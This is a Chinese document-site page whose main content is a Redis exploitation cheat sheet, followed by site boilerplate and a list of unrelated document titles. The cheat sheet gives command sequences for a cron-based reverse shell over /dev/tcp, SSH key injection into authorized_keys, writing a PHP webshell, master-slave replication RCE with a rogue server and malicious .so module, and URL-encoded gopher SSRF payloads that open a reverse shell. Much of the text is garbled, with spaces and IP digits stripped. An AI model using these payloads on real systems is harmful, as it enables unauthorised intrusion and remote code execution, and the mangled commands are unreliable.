




版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
PAGE1redis利用总结主讲moonsec利用计划任务反弹shell/Fly_hps/article/details/102690282centos成功ubuntu失败setxx"\n*****bash-i>&/dev/tcp/13/99990>&1\n"configsetdir/var/spool/cron/configsetdbfilenamerootsaveecho-e"\n\n*/1****/bin/bash-i>&/dev/tcp//12340>&1\n\n"|redis-cli-h29-xset1
redis-cli-h29configsetdir/var/spool/cron/
redis-cli-h29configsetdbfilenameroot
redis-cli-h29save redis密钥登录ssh生成密钥公钥ssh-keygen-trsa防止乱码导出key(echo-e"\n\n";catid_rsa.pub;echo-e"\n\n")>key.txt导入内容catkey.txt|redis-cli-h08--passpass123-xsetxxx--pass是登录密码无密码可不填设置路径configsetdir/root/.ssh设置文件名configsetdbfilenameauthorized_keys保存savessh登录ssh-iid_rsaroot@08redis写webshell08:6379>configsetdir/var/www/html/08:6379>configsetdbfilenameshell.php08:6379>setx"<?phpphpinfo();?>"08:6379>save利用主从复制RCE漏洞存在于4.x、5.x版本中,Redis提供了主从模式,主从模式指使用一个redis作为主机,其他的作为备份机,主机从机数据都是一样的,从机只负责读,主机只负责写。在Reids4.x之后,通过外部拓展,可以实现在redis中实现一个新的Redis命令,构造恶意.so文件。在两个Redis实例设置主从模式的时候,Redis的主机实例可以通过FULLRESYNC同步文件到从机上。然后在从机上加载恶意so文件,即可执行命令。受害人就是从机so文件攻击者就是主机so文件工具下载/n0b0dyCN/redis-rogue-server/Testzero-wz/Awsome-Redis-Rogue-Serverpython3redis-rogue-server.py--rhost09--lhost45反弹shell监听端口nc-lvnp9999如果遇上带密码的改一下脚本就可以了。ssrfredis反弹shellgopher://:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aconfig%2520set%2520dir%2520/tmp/%250d%250aquitgopher://:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aconfig%2520set%2520dbfilename%2520exp.so%250d%250aslaveof%252019%252021000%250d%250aquit导入模块gopher://:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250amodule%2520load%2520./exp.so%250d%250aquit关闭主从gopher://:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aslaveof%2520NO%2520ONE%250d%250aquit设置数据库名gopher://:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aconfig%2520set%2520dbfilename%2520dump.rdb%250d%250aquit反弹shellgopher://:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250asystem.rev%252019%25206666%250d%250aquit本地redis主从复制RCE反弹shellkali命令nc-lvnp2333python3redis_rogue_server.py-v-pathexp.soubuntu上操作configsetdir/tmpconfigsetdbfilenameexp.soslaveof1921000moduleload./exp.soslaveofNOONEsystem.rev192333
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 智慧课堂省级课题申报书
- 数字孪生课题申报书
- 课题立项申报书幼儿园
- 孔子学堂课题申报书
- 兵团课题申报书
- 经济类课题申报书范例
- 城市更新课题申报书范本
- 医院消防劳务合同范本
- 课题申报书是啥
- 教育科研方法课题申报书
- 现代家政导论-课件 3.1.1认识家庭生命周期
- 保险公司客户服务质量提升手册
- 成语故事-一诺千金-课件
- 餐厨废弃物处理台账记录表
- 钢筋工安全操作规程
- 国家基本药物培训课件
- 煤矿安全管理人员考试题库与答案(G卷)
- SMP-07-008-00 印刷性包装材料管理规程
- 2024年深圳市优才人力资源有限公司招考聘用综合网格员(派遣至吉华街道)高频难、易错点500题模拟试题附带答案详解
- 旅游景区物业管理服务方案
- 华能内蒙古东部能源有限公司招聘笔试题库2024
评论
0/150
提交评论